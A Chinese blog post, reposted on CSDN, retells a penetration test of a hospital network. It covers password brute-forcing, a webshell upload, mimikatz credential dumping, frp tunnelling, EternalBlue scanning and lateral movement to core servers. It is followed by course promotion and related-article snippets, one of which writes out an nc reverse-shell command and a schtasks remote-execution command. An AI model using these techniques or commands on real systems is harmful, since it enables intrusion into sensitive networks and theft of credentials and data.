攻防实战之内网渗透,从零基础到精通,收藏这篇就够了!

最新推荐文章于 2025-05-16 17:40:16 发布
最新推荐文章于 2025-05-16 17:40:16 发布
阅读量995 收藏 18
点赞数 14
CC 4.0 BY-SA版权
文章标签: 网络 安全 网络安全 系统安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Libra1313/article/details/147161405

开场白:演习?还是“走钢丝”?

某医院为了应付年度检查,找来了一支网络安全团队——“中科实数安服培训事业部-渗透测试小组”——进行所谓的“网络安全演练”。说是演练,但感觉更像是在悬崖边上走钢丝,一不小心就得“粉身碎骨”。

“万能钥匙”开后门:前期打点,一打一个准?

目标暴露:管理平台成“不设防”地带

信息收集阶段,医院的管理平台系统就这么大喇喇地暴露在攻击者的视野里。这就像在自家门口挂了个牌子,上面写着:“欢迎来我家,密码是XXXX”。(敏感信息已打码,但打码能解决问题吗?值得深思!)

密码爆破:是字典太强大,还是安全意识太薄弱?

接下来,攻击者用“万能字典”进行密码爆破。这年头,谁还没个密码字典?问题是,你的密码强度真的能抵挡住这些“万能钥匙”吗?

图片马上传:这上传点,简直是“为所欲为”

更骚的是,找到上传点后,图片马竟然直接上传并解析成功了!这就像在高速公路上开了个缺口,然后跟别人说:“哎呀,你怎么开进来了?”

蚁剑连接:恭喜你,喜提“随便看看”权限

最后,用蚁剑工具轻松连接。这感觉就像拿到了一把“随便看看”的钥匙,可以随意浏览、修改甚至删除系统文件。

双网卡成“双刃剑”:内网本机信息,一览无遗?

双网卡暴露:物理隔离?不存在的

检查网络信息时,发现系统配置了双网卡。这本该是提高网络稳定性的手段,但在这里,却成了暴露内网的“双刃剑”。

远程登录信息:Mimikatz“一网打尽”

通过Ping baidu确认可以出网后,直接上线CS,然后用mimikatz模块读取远程登录的账户和密码。这就像是把所有的钥匙都放在了一个篮子里,然后告诉小偷:“随便拿,随便用”。

远程桌面服务:敞开大门,欢迎光临?

不仅如此,远程桌面服务还是开启的,端口也是默认的3389。这简直就是在门口挂了个牌子,上面写着:“远程桌面,密码已破解,欢迎光临!”

“永恒之蓝”成“通行证”:突破隔离,如入无人之境?

FRP反向代理:穿透隔离,易如反掌

通过frp建立反向代理,轻松穿透隔离,登录到对方的服务器。这隔离,形同虚设啊!

Fscan扫描:“惊喜”连连,漏洞百出

用fscan工具进行C段扫描,发现了多个主机存在永恒之蓝漏洞,还有数据库的弱口令。这简直是“惊喜”连连,漏洞多到让人眼花缭乱。

内网信息收集:数据库密码,唾手可得

使用内网信息收集工具对本机进行扫描,收集了包括数据库用户名和密码、配置文件、mstsc历史记录等关键信息。这意味着,攻击者可以轻松地获取到大量的敏感数据。

横向渗透:如入无人之境,核心数据“拱手相让”?

MSTSC历史记录:直达核心内网的“传送门”

通过远程登录界面查看连接历史记录可以直接登录到别的服务器,进入10段。通过收集到的密码和弱口令进行爆破,获取到很多web系统权限。这就像是拿到了一张地图,上面标注了所有核心服务器的位置。

核心内网:不设防的“金库”

通过别的服务器mstsc远程连接记录直接进入到核心内网。这意味着,攻击者已经可以随意访问核心服务器和数据库,窃取、修改甚至删除任何数据。

“演习”变“入侵”:是成功,还是警钟?

总结:前期信息收集是关键?还是安全防线太脆弱?

文章最后总结说,整个过程相对顺利,得益于前期的信息收集工作。但真的是这样吗?难道不应该反思一下,为什么医院的网络安全防线如此脆弱,以至于攻击者可以如此轻松地进入核心内网?这真的是一次成功的“演习”吗?还是敲响了医院网络安全的警钟?

如侵权请联系,立即删除。(这句话是不是应该改成:“如果医院觉得我说得不对,欢迎来battle!”)
```

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

*************************************优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享*********************************

黑客大白
关注
[Python从零到壹] 六十.图像识别及经典案例之基于阈值及边缘检测的图像分割
杨秀璋的专栏
12-23 6042
欢迎大家来到“Python从零到壹”,在这里我将分享约200Python系列文章,带大家一起去学习和玩耍。第一部分作者介绍了图像处理基础知识,第二部分介绍了图像运算和图像增强,接下来第三部分我们将详细讲解图像识别及图像处理经典案例,该部分属于高阶图像处理知识,能进一步加深我们的理解和实践能力。图像分割是将图像分成若干具有独特性质的区域并提取感兴趣目标的技术和过程,它是图像处理和图像分析的关键步骤。本文将重点围绕图像处理实例,详细讲解各种图像分割的方法。希望文章对您有所帮助,如果有不足之处,还请海涵。
渗透|内网攻防—多级代理
include_voidmain的博客
03-03 6513
0x01前言 本文讲述由公司的一次内靶场攻防,对多级代理的建立和配置进行分享,首先介绍一下靶场。 入口是有web漏洞的linux机器,横向到一个有漏洞的winPC上(双卡),通过双卡ms17-010到域成员机器上,最后打域控。 这里因为幅原因,不说攻打靶场的全过程,直接到frp隧道的建立和连接。 攻击机(kali):172.16.222.128 入口机:192.168.10.10 winPC:192.168.10.20/ 192.168.20.10 ms17-010: 192.168.20.20/
一次实战环境横向内渗透记录
weixin_44284303的博客
07-08 1581
渗透背景: 某反病毒公司即将推出一种新的反病毒产品,已知该公司员工Molos的电脑中有该反病毒产品的相关信息,目标是将该文件取出并不被发现 已有条件: (1)你已经进入了内中 (2)四个已知ip: 10.21.48.70 10.21.48.72 10.21.48.73 10.21.48.75 (3)攻击机kali:10.21.48.58 /内渗透过程**/ 1.信息收集 通过nmap进行信息收...
简单的内渗透靶场实战(tp漏洞、msf、psexec横向渗透、权限维持)
Web安全工具库
07-30 3545
​ 前言环境搭建web服务器渗透nmap探测端口thinkphp getshellthinkphp批量检测内信息搜集内渗透上线msf信息搜集获取凭证思路内横向移动MS17-010尝试psexec尝试ipc连接关闭域控防火墙psexec尝试*2登录远程桌面权限维持DSRM后门日志清除 1 前言 在内渗透的过程中思路才是最重要的,本次内渗透的主机虽然不多,主要还是锻炼自己内渗透的一个思想。 2环境搭建 靶场: win7(内):192.168.138...
手把手教你如何进行内渗透:从零基础实战突破(非常详细)从零基础精通收藏了!
最新发布
Javachichi的博客
05-16 1607
近年来,内安全已成为攻防对抗的核心战场。据统计,2024年全球因内渗透导致的数据泄露事件同比增长67%,其中超过80%的攻击通过横向移动实现全域控制。本文基于最新攻防技术与实战案例,系统化拆解内渗透全流程,并提供可落地的防御建议。
横向渗透
weixin_58782362的博客
09-28 632
因为在目标主机上面上传套件在实战中不实用,可能照成数据包丢失,也可能被查杀,也有可能目标主机没有相对的语言解析,所以最好的办法就是直接使用代理。建立ipc链接到目标主机--拷贝要执行的命令脚本到目标主机--查看目标时间、创建计划任务定时执行拷贝到的脚本--删除ipc链接。外部:(交互式,外人开发工具),本地使用./administartor,域主机使用god/administartor。下载对应release,建立socks连接,设置socks代理,配置规则,调用!内部:(交互式windows官方工具)
安全学习(三)---横向渗透
qi_SJQ_的博客
02-09 1177
域横向 smb&wmi 明文或 hash 传递 1.前置知识: 知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码。 Windows2012以下版本安装KB2871997补丁,也会导致无法获取明文密码。 针对以上情况,我们提供了4种方式解决此类问题: 1.利用哈希hash传递(pth,ptk等)进行移动。 2.利用其他服务协议(SMB,WMI等)进行哈希移动。 3.利用注册表操作开启Wdigest Auth值进行获取。 4.利用工具或第三方平台(
红蓝对抗下的内横向移动渗透技术详解
lurenjia404的博客
07-02 2840
本文主要介绍了利用远程服务进行横向渗透的方法,读者阅读本章内容后就能理解,红队人员一旦通过外部某一个点进入了企业内部网络之中,那么内之中所有的安全防护设备将会形同虚设,红队人员在内之中获取核心靶标的系统权限如同探囊取物。因此,如何有效地建立内横向渗透安全防护体系就成了大部分企业及蓝队防守人员值得思考的问题,笔者希望通过本章对红队人员进行横向渗透所常利用的手法的介绍,读者能对内安全体系建设引起更多的重视和思考。
网络安全入门教程(非常详细)从零基础入门到精通
2301_77160226的博客
09-06 3035
网络安全是一个充满挑战和机遇的领域,随着数字化时代的发展,网络安全的重要性日益凸显。通过系统的学习和实践,掌握网络安全的基础知识和技能,不断提升自己的能力,你可以在这个领域中取得成功。同时,要保持对网络安全的热情和好奇心,持续学习和关注行业动态,为保护网络空间的安全贡献自己的力量。希望这网络安全入门教程能帮助你从零基础入门,逐步精通网络安全领域,开启你的网络安全之旅。
Web安全攻防全攻略】:Web挑战题精讲 - 从入门到精通实战技巧
[【Web安全攻防全攻略】:Web挑战题精讲 - 从入门到精通实战技巧](https://www.ifourtechnolab.com/pics/Principles%20of%20Web%20Security.webp) # 摘要 本文全面概述了Web安全攻防的关键概念和实践技巧,首先...
国内首本 .NET 攻防实战力作丨《.NET安全攻防指南》新书上线,文末领取福利!
ahhacker86的专栏
03-22 896
不少读者反馈,本书内容系统全面,涵盖从基础原理到攻防实战的完整技术体系,特别是在.NET Web安全审计和逆向工程领域,提供了许多实用的思路和技巧,极具实战价值。上册主要聚焦于B/S架构下的安全实践,结构上从.NET基础知识入手,循序渐进地揭示.NET Web代码审计的核心技术与攻防思路,帮助读者全面掌握.NET Web应用的安全要点。本书凝聚了多年来在.NET安全领域的攻防实战经验,内容系统全面,涵盖从基础原理到红蓝对抗的完整技术体系,是.NET安全研究者和攻防实战者不可或缺的技术宝典。
精通Android安全攻防实战指南
Imran带领读者踏上Android安全之旅,从基础知识开始,逐步深入到高级概念,包括Android设备的Root、应用程序安全评估、恶意软件、APK文件的感染以及模糊测试(fuzzing)。 读者将学到以下关键知识点: 1. **...
胡乱自学黑客的,能骂醒一个算一个
2401_84208172的博客
05-05 1121
为啥说胡乱自学黑客的,能骂醒一个算一个。因为很多人学会个工具就觉得自己是黑客了,其实再真正的黑客眼里,你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知,其实最重要的是兴趣热爱,不同于网络安全工程师,他们大都是培训机构培训出来的,具备的基本都是防御和白帽子技能,他们绝大多数的人看的是工资,他们是为了就业而学习,为了走捷径才去参加培训。
初学内横向命令执行
The current road is different, love needs to distinguish between right and wrong
12-24 1354
简介 横向移动,根据定义是指获取内某台机器的控制权之后,以被攻陷主机为跳板,通过搜集域内凭证,找办法访问到域内其他机器,再依次循环往复,直到获得域控权限甚至控制内。 1.IPC 计划任务横向 IPC共享命名管道的资源,是为了实现进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,使用139、445端口。建立向目标主机的IPC$连接,把命令执行的脚本传到目标主机,创建计划任务在目标机器上执行命令脚本。 1、目标主机开启了139和445端口; 2、目标主机开启了ipc$默认
内网攻防学习Day1——常见的内结构
dzqxwzoe的博客
08-19 353
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。而实际上,因为域中的计算机是使用DNS来定位域控制器、服务器及其他计算机、网络服务的,所以域的名字就是DNS域的名字。每个域中都有独立的安全策略。首先要理解一下组的概念,在组里包含了很多用户,当管理员想要给某个用户分配权限时,只需要将用户加入到对应权限的组里就行,从而提高了管理效率,常见的组有:域本地组、全局组、通用组。
网络攻防之内安全横向渗透权限提升
weixin_46626737的博客
06-30 878
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
一个内安全攻防的知识仓库(非常详细)零基础入门到精通收藏这一
Python_0011的博客
04-15 926
信息搜集字典列表密码生成邮箱列表获取泄露密码查询对企业外部相关信息进行搜集子域名获取githubwhois查询/注册人反查/邮箱反查/相关资产开源情报信息收集(OSINT)创建企业密码字典进入内基于企业弱账号漏洞基于系统漏洞进入站应用程序渗透无线Wi-Fi接入隐匿攻击Fronting代理内跨边界应用EWTermite代理脚本内跨边界转发内跨边界代理穿透shell反弹内文件的传输和下载搭建 HTTP server内信息搜集端口扫描。
安全攻防(一)
YUKIDDDD的博客
08-01 1155
第1章 内基础知识1.1 内基础知识 1.1 内基础知识 内也指局域,是指在某一区域内由多台计算机互连而成的计算机组 工作组 将不同的计算机按功能进行分组就产生了工作组的概念。 计算机可以随意加入或退出工作组 工作组里所有计算机都是对等的 工作组中的计算机可以互相共享资源 域(Domain) 域是一个有安全边界的计算机集合 域的安全管理机制更加严格,用户要访问域内的资源,必须以合法的身份登录域 用户对域内的资源权限取决于用户身份 单域 在一个域内,一般要有至少两台域服务器,一台作为
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值